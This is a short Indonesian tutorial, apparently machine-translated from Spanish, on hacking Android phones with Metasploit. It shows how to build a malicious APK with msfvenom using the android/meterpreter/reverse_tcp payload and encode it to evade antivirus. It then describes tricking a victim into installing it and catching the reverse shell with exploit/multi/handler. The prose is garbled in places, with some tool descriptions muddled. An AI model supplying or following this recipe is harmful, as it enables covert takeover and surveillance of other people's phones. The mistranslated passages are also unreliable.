Meng-hack Android dengan Metasploit
Meng-hack Android dengan Metasploit
UNAN-LEÓN
Anggota
[Link]ía Narváez Argeñal.
[Link] Ángel Vallecillo Dávila
Langkah-langkah dasar yang harus diikuti untuk mengeksploitasi kerentanan menggunakan Metasploit adalah:
Memilih dan mengonfigurasi eksploit (seperti yang telah kami katakan, kode yang memungkinkan mengeksploitasi)
kerentanan suatu sistem
Konfirmasi apakah tujuan dapat terpengaruh oleh eksploitasi yang dipilih (langkah ini bersifat opsional).
Pilih dan atur payload (kode yang dijalankan setelah kita mengeksploitasi
vulnerabilitas).
Pilih teknik encode atau pengkodean agar payload tidak terdeteksi
karena elemen keamanan perangkat (juga opsional meskipun
rekomendabel).
Jalankan eksploitasi.
Untuk pelaksanaan ini dan tindakan lainnya, Metasploit memasukkan yang berikut
alat
Dengan sepasang baris perintah sederhana dan sedikit rekayasa sosial kita bisa
mengakses perangkat Android.
KITA BUTUHKAN:
Kami membuat file berbahaya, untuk itu kami menggunakan MSFVENOM dari sebuah
terminal:
-msfvenom adalah penggabungan dari msfpayload dan msfencode, msfpayload bertanggung jawab untuk
menghasilkan payload untuk berbagai platform, sementara msfencode menangani
untuk mendekode payload tersebut dengan tujuan menghindari deteksi melalui
penggunaan antivirus.
- Melalui bendera-pkami akan menentukan bahwa akan digunakan Payload yang mana
kami akan menyerang telepon target kami, dalam hal ini:meterpreter.
- Akhirnya melalui benderaR > <tempat di mana kita akan menyimpan untuk
apk>/<nama apk>.apk,kami akan menjelaskan di mana akan dihosting
apk dan nama ini.
(Opsional)
msfvenom: Menunjukkan bahwa kita akan menggunakan Metasploit untuk serangan.
-p: Beri tahu msfvenom bahwa kita akan menggunakan payload.
android/meterpreter/reverse_tcp: Kami akan menggunakan meterpreter melalui sebuah
koneksi terbalik, ini berarti bahwa perangkat korbanlah yang akan membuka dengan
kami sebuah sesi di Meterpreter.
lhost: Menunjukkan host dari "Virus", dalam hal ini kami menunjukkan IP privat kami, yang
nos memberi kita Router untuk mengidentifikasi diri kita di dalam host.
lport: Ini adalah port yang akan kita gunakan untuk serangan, coba untuk tidak menggunakan port
biasanya digunakan sebagai 80,4444, karena mungkin sedang digunakan.
Langkah selanjutnya adalah membiarkan 'mendengarkan' dari KALI sampai korban menjalankan
aplikasi, untuk itu kita membuka METASPLOIT dan mengonfigurasinya sebagai berikut
cara
msfconsole
gunakan exploit/multi/handler
eksploitasi
Dengan ini kita memiliki sesi Meterpreter yang terhubung ke korban kita, di sini
kasus dapat dilihat bahwa perintah "sysinfo"
Dengan perintah HELP kita bisa melihat tindakan apa yang bisa kita lakukan di
perangkat, banyak dari tindakan tersebut sudah dijelaskan di POST sebelumnya,
tetapi tindakan khusus Android adalah: